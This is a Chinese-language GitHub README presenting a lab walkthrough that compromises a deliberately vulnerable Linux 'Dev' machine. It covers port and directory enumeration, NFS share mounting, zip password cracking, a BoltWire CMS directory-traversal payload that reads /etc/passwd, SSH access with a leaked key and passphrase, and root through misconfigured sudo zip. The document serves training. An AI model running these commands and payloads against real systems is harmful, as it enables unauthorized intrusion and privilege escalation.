LexKingz/dev-linux-attack-privilege-escalation-lab

GitHub: LexKingz/dev-linux-attack-privilege-escalation-lab

一个展示Linux完整渗透测试流程的实验环境,涵盖NFS利用、CMS漏洞、SSH密钥滥用和sudo提权等攻击技术。

Stars: 0 | Forks: 0

# Dev Machine – Linux 渗透测试实验 本实验演示了针对 Linux 目标的完整渗透测试流程。 攻击链包括 **网络枚举、NFS 利用、CMS 漏洞利用、利用泄露的凭据进行 SSH 访问,以及通过配置不当的 sudo 权限进行权限提升**。 该练习强调了 **正确的服务配置、凭据保护以及最小权限访问控制** 的重要性。 # 初始枚举 获取目标 IP 地址后,执行了 **Nmap 扫描** 以识别开放的服务。 ``` nmap -T4 -p- -A ``` 扫描结果显示了以下关键服务: ``` 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-title: Bolt - Installation error |_http-server-header: Apache/2.4.38 (Debian) 8080/tcp open http Apache httpd 2.4.38 ((Debian)) | http-open-proxy: Potentially OPEN proxy. |_Methods supported: CONNECTION |_http-server-header: Apache/2.4.38 (Debian) |_http-title: PHP 7.3.27-1~deb10u1 - phpinfo() 2049/tcp open nfs 3-4 (RPC #100003) ``` 重要发现: * **端口 80** — Web 服务器 (Apache) * **端口 8080** — 辅助 Web 服务器 * **端口 2049** — NFS (网络文件系统) # Web 枚举 通过浏览器查看了这两个 Web 服务。 ``` http://:80 http://:8080 ``` * screenshots/01-port-80.png * screenshots/02-port-8080.png # 目录枚举 为了发现隐藏目录,使用了 **ffuf**。 示例命令: ``` ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http:///FUZZ ``` 结果: **端口 80 发现的目录** ``` /public /src /app /vendor ``` **端口 8080 发现的目录** ``` /dev ``` * screenshots/03-fuff-dirbust-port-80.png * screenshots/04-fuff-dirbust-port-8080.png # NFS 枚举 由于 **NFS (端口 2049)** 处于开放状态,对可用的挂载点进行了枚举。 ``` showmount -e ``` 在本地创建了一个目录用于挂载共享: ``` mkdir /mount/dev ``` * screenshots/04-show-mountpoint-and-dir.png 挂载该共享: ``` mount -t nfs :/srv/nfs /mount/dev ``` 在挂载的目录中,发现了一个 **受密码保护的 zip 文件**。 * screenshots/05-mounted.png # 破解 ZIP 压缩包 使用 **fcrackzip** 破解了该 ZIP 压缩包。 ``` fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt save.zip ``` 破解密码后,提取了两个文件: * `todo.txt` * `id_rsa` (SSH 私钥) - screenshots/06-fcrack-crack-unzip.png - screenshots/07-view-2-files-and-ssh.png `todo.txt` 文件中包含一个引用了 **jp** 的签名。 然而,尝试使用 **jp** 进行 SSH 登录并未成功。 # 调查 Web 目录 接下来,调查了之前发现的目录。 ``` /public /src /app ``` * screenshots/08-public.png * screenshots/09-scr.png * screenshots/10-app.png 在 `/app` 目录中发现了几个有用的文件夹,包括: ``` /cache /config ``` 在 `/config` 中,文件 **config.yml** 包含了凭据。 * screenshots/11-config-yml-file.png * screenshots/12-config-yml-file2.png 这些凭据被保存以备后用。 # BoltWire CMS 发现 根据 **端口 8080 的扫描** 结果,探索了 `/dev` 目录。 * screenshots/13-dev-path.png 这揭示了存在一个 **BoltWire CMS** 安装。 该 CMS 允许用户注册。 * screenshots/14-regiser-page.png * screenshots/15-registered.png # 搜索漏洞 使用以下命令搜索了 **BoltWire exploits**: ``` searchsploit boltwire ``` * screenshots/16-searchsploit-result.png 发现了一个涉及 **目录遍历** 的漏洞利用。 * screenshots/17-the-exploit.png # 利用目录遍历 使用了以下 payload: ``` index.php?p=action.search&action=../../../../../../../etc/passwd ``` 注意:在执行漏洞利用之前需要进行身份验证。 * screenshots/18-traversal-attack-executed-1.png * screenshots/19-traversal-attack-executed-2.png * screenshots/20-traversal-attack-executed-3.png 该漏洞利用成功暴露了 **/etc/passwd** 文件。 # 发现有效用户 从 `/etc/passwd` 中,确定了正确的用户名为: ``` jeanpaul ``` 使用之前获取的 SSH 密钥: ``` ssh -i id_rsa jeanpaul@ ``` * screenshots/21-ssh-using-etc-passwd-found-credential.png 系统要求输入 **passphrase**。 尝试使用之前在 `config.yml` 中发现的密码: ``` I_love_java ``` * screenshots/22-passwd-yml-credential.png 认证成功。 * screenshots/23-gained-low-level-shell.png 获得了一个低权限 shell。 # 权限提升枚举 检查 sudo 权限: ``` sudo -l ``` 结果: 用户 **jeanpaul** 可以运行: ``` zip ``` 以 **root** 身份且 **无需密码**。 * screenshots/24-test-sudo-ability-and-confirmed.png # 利用 Sudo ZIP 权限 搜索权限提升方法时发现了 **GTFOBins**。 * screenshots/25-exploit-gtfo-1.png 筛选 **sudo exploits** 后,发现了一种滥用 **zip** 的技术。 * screenshots/26-exploit-gtfo-2.png * screenshots/27-exploit-gtfo-3.png 执行 GTFOBins 上的命令获得了 root shell。 * screenshots/28-root-access-to-dev-machine.png # 获得_root_权限 权限提升成功,获得了系统上的 **root 权限**。 # 关键经验总结 本实验演示了几种重要的渗透测试技术: • 利用暴露的 **NFS 共享** • 破解受密码保护的压缩包 • 从 **配置不当的 Web 应用程序** 中提取凭据 • 利用 **目录遍历漏洞** • 利用 **SSH 密钥进行身份验证** • 通过 **配置不当的 sudo 权限** 提升权限 # 展示的技能 * 网络枚举 * Web 应用程序枚举 * NFS 利用 * 凭据发现 * 目录遍历攻击 * SSH 密钥认证 * Linux 权限提升 * GTFOBins 利用
标签:Apache, CMS漏洞, CTF学习, CTI, Ffuf, NFS枚举, NFS漏洞利用, Nmap, OPA, PE 加载器, SSH密钥滥用, Sudo配置错误, Web报告查看器, 内存分配, 内网渗透, 协议分析, 密码管理, 提权, 插件系统, 攻击链, 数据统计, 权限提升, 漏洞复现, 端口扫描, 网络安全, 网络安全审计, 虚拟驱动器, 足迹分析, 隐私保护, 靶场